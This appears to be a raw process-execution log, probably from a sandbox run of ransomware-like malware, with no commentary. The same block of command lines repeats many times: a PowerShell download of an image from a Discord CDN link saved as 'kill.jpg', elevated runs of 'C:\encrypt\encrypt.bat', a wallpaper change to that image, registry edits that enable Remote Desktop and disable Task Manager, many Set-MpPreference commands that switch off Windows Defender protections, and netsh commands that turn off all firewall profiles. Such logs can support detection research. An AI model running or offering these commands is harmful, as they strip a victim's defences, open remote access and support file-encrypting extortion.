C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

